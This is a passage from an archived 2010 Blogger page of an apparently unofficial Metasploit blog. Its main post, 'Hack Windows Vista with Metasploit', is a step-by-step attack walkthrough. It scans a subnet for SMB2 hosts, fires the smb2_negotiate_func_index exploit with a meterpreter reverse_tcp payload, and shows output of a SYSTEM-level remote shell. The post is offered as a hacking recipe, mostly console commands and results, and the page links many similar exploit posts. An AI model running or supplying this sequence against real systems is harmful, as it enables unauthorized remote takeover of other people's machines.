href='http://meta-sploit.blogspot.com/search/label/Windows' rel='tag'>Windows</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <h2 class='date-header'>Saturday, January 2, 2010</h2> <div class='post hentry uncustomized-post-template'> <a name='3328089179519616409'></a> <h3 class='post-title entry-title'> <a href='http://meta-sploit.blogspot.com/2010/01/hack-windows-vista-with-metasploit.html'>Hack Windows Vista with Metasploit</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Write:<br /><br />msf> use auxiliary/scanner/smb/smb2<br />msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24<br />msf (auxiliary/smb2) > set THREADS 100<br />msf (auxiliary/smb2) > run<br /><br />[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours<br />[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours<br /><br />When using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare.<br /><br />Now that we have identified two systems with SMB2 enabled, its exploit time!<br /><br />msf> use exploit/windows/smb/smb2_negotiate_func_index<br />msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp<br />msf (exploit/smb2) > set LHOST 192.168.0.136<br />msf (exploit/smb2) > set LPORT 5678<br />msf (exploit/smb2) > set RHOST 192.168.0.211<br />msf (exploit/smb2) > exploit<br /><br />[*] Started reverse handler<br />[*] Connecting to the target (192.168.0.211:445)...<br />[*] Sending the exploit packet (854 bytes)...<br />[*] Waiting up to 180 seconds for exploit to trigger...<br />[*] Sending stage (719360 bytes)<br />[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)<br /><br />meterpreter > sysinfo<br />Computer: WIN-UAKGQGDWLX2<br />OS : Windows 2008 (Build 6001, Service Pack 1).<br />Arch : x86<br />Language: en_US<br /><br />meterpreter > getuid<br />Server username: NT AUTHORITY\SYSTEM<br /><br />Voila! A great way to justify disabling SMB2 across your network.<br /><br />Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both Full and Mini versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.<br /><br />For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in Full and Mini versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:<br /><br />C:\> framework-3.3-dev-mini.exe /S /D=C:\metasploit33dev<br /><br />We would like to make sure everyone is aware of the freely-available Metasploit Unleashed Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months. <br /><br />Metasploit Blog <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn'>XyLeM</span> </span> <span class='post-timestamp'> at <a class='timestamp-link' href='http://meta-sploit.blogspot.com/2010/01/hack-windows-vista-with-metasploit.html' rel='bookmark' title='permanent link'><abbr class='published' title='2010-01-02T17:55:00-08:00'>5:55 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://meta-sploit.blogspot.com/2010/01/hack-windows-vista-with-metasploit.html#comment-form' onclick=''>5 comments</a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-control blog-admin pid-679096321'> <a href='https://www.blogger.com/post-edit.g?blogID=6914650419156458125&postID=3328089179519616409&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Labels: <a href='http://meta-sploit.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a>, <a href='http://meta-sploit.blogspot.com/search/label/SMB' rel='tag'>SMB</a>, <a href='http://meta-sploit.blogspot.com/search/label/SMB2' rel='tag'>SMB2</a>, <a href='http://meta-sploit.blogspot.com/search/label/Vista' rel='tag'>Vista</a>, <a href='http://meta-sploit.blogspot.com/search/label/Windows' rel='tag'>Windows</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <!--Can't find substitution for tag [adEnd]--> </div> <div class='blog-pager' id='blog-pager'> <span id='blog-pager-newer-link'> <a class='blog-pager-newer-link' href='http://meta-sploit.blogspot.com/' id='Blog1_blog-pager-newer-link' title='Newer Posts'>Newer Posts</a> </span> <a class='home-link' href='http://meta-sploit.blogspot.com/'>Home</a> </div> <div class='clear'></div> </div></div> </div> <div id='sidebar-wrapper'> <div class='sidebar section' id='sidebar'><div class='widget Label' data-version='1' id='Label1'> <h2>Labels</h2> <div class='widget-content list-label-widget-content'> <ul> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Console'>Console</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/FTP'>FTP</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Hacking'>Hacking</a> <span dir='ltr'>(9)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/IE'>IE</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Infos'>Infos</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Metasploit%203.x'>Metasploit 3.x</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Meterpreter'>Meterpreter</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Microsoft%20IIS'>Microsoft IIS</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Netcat-like'>Netcat-like</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/phpBB'>phpBB</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Remote'>Remote</a> <span dir='ltr'>(2)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/SMB'>SMB</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/SMB2'>SMB2</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/sploitz'>sploitz</a> <span dir='ltr'>(4)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Update'>Update</a> <span dir='ltr'>(2)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Vid'>Vid</a> <span dir='ltr'>(6)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Vista'>Vista</a> <span dir='ltr'>(1)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/VNC'>VNC</a> <span dir='ltr'>(2)</span> </li> <li> <a dir='ltr' href='http://meta-sploit.blogspot.com/search/label/Windows'>Windows</a> <span dir='ltr'>(4)</span> </li> </ul> <div class='clear'></div> </div> </div><div class='widget BlogArchive' data-version='1' id='BlogArchive1'> <h2>Blog Archive</h2> <div class='widget-content'> <div id='ArchiveList'> <div id='BlogArchive1_ArchiveList'> <ul> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'> ▼  </span> </a> <a class='post-count-link' href='http://meta-sploit.blogspot.com/2010/'>2010</a> <span class='post-count' dir='ltr'>(16)</span> <ul> <li class='archivedate expanded'> <a class='toggle' href='javascript:void(0)'> <span class='zippy toggle-open'> ▼  </span> </a> <a class='post-count-link' href='http://meta-sploit.blogspot.com/2010/01/'>January</a> <span class='post-count' dir='ltr'>(16)</span> <ul class='posts'> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-reverse-vnc-hidden-in-word.html'>Metasploit: Reverse VNC hidden in a Word file</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.html'>Exploiting Microsoft IIS with Metasploit</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-what-is-it.html'>Metasploit? What is it?</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-33-released.html'>Metasploit 3.3 Released</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-framework.html'>The Metasploit Framework</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-msvidctlmpeg2.html'>Metasploit - msvidctl_mpeg2</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/hacking-malware-video-tut.html'>Hacking Malware [Video Tut]</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/sasser-ftpd-remote-exploit-for-ftp.html'>Sasser FTPd - Remote exploit for the FTP</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/phpbb-highlight-remote-exploit-for.html'>phpBB Highlight - Remote exploit for phpBB</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/netcat-like-console-command-connect.html'>Netcat-like Console Command: Connect</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-mass-exploitation-for.html'>Metasploit Mass Exploitation for Dummies</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-post-exploitation.html'>Metasploit Post Exploitation - Prefetchtool Meterp...</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-vnc-injecting.html'>Metasploit - VNC Injecting</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-ie-unsafe-scripting-exploit.html'>Metasploit - IE Unsafe Scripting Exploit</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/metasploit-msrpc-exploit.html'>Metasploit - msrpc exploit</a></li> <li><a href='http://meta-sploit.blogspot.com/2010/01/hack-windows-vista-with-metasploit.html'>Hack Windows Vista with Metasploit</a></li> </ul> </li> </ul> </li> </ul> </div> </div> <div class='clear'></div> </div> </div></div> </div> <!-- spacer for skins that want sidebar and main to be the same height--> <div class='clear'> </div> </div> <!-- end content-wrapper --> <div id='footer-wrapper'> <div class='footer no-items section' id='footer'></div> <center><a href='http://www.metasploit.com/framework/download/'><img src='http://i48.tinypic.com/212y4hi.jpg2'/></a> <a href='http://books.google.com/books?q=metasploit'><img src='http://i47.tinypic.com/2zz5ag6.png'/></a></center> </div> </div></div> <!-- end outer-wrapper --> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/2087407620-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY6ghNgOrwpkYBuNaPm7C8Agjn7wPw:1711637729093';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d6914650419156458125','//meta-sploit.blogspot.com/2010/01/','6914650419156458125'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '6914650419156458125', 'title': 'CLOSED', 'url': 'http://meta-sploit.blogspot.com/2010/01/', 'canonicalUrl': 'http://meta-sploit.blogspot.com/2010/01/', 'homepageUrl': 'http://meta-sploit.blogspot.com/', 'searchUrl': 'http://meta-sploit.blogspot.com/search', 'canonicalHomepageUrl': 'http://meta-sploit.blogspot.com/', 'blogspotFaviconUrl': 'http://meta-sploit.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22CLOSED - Atom\x22 href\x3d\x22http://meta-sploit.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22CLOSED - RSS\x22 href\x3d\x22http://meta-sploit.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22CLOSED - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/6914650419156458125/posts/default\x22 /\x3e\n', 'meTag': '', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/9058130ec67b7088', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Get link', 'key': 'link', 'shareMessage': 'Get link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Share to Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'Twitter', 'key': 'twitter', 'shareMessage': 'Share to Twitter', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Share to Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27en\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Read more', 'pageType': 'archive', 'pageName': 'January 2010', 'pageTitle': 'CLOSED: January 2010'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Link copied to clipboard!', 'ok': 'Ok', 'postLink': 'Post Link'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'CLOSED', 'description': 'Unofficial blog of Metasploit', 'url': 'http://meta-sploit.blogspot.com/2010/01/', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': true, 'isLabelSearch': false, 'archive': {'year': 2010, 'month': 1, 'rangeMessage': 'Showing posts from January, 2010'}}}]); _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/1865175624-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/3268905543-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar', document.getElementById('Label1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Loading\x26hellip;'}, 'displayModeFull')); </script> </body> </html>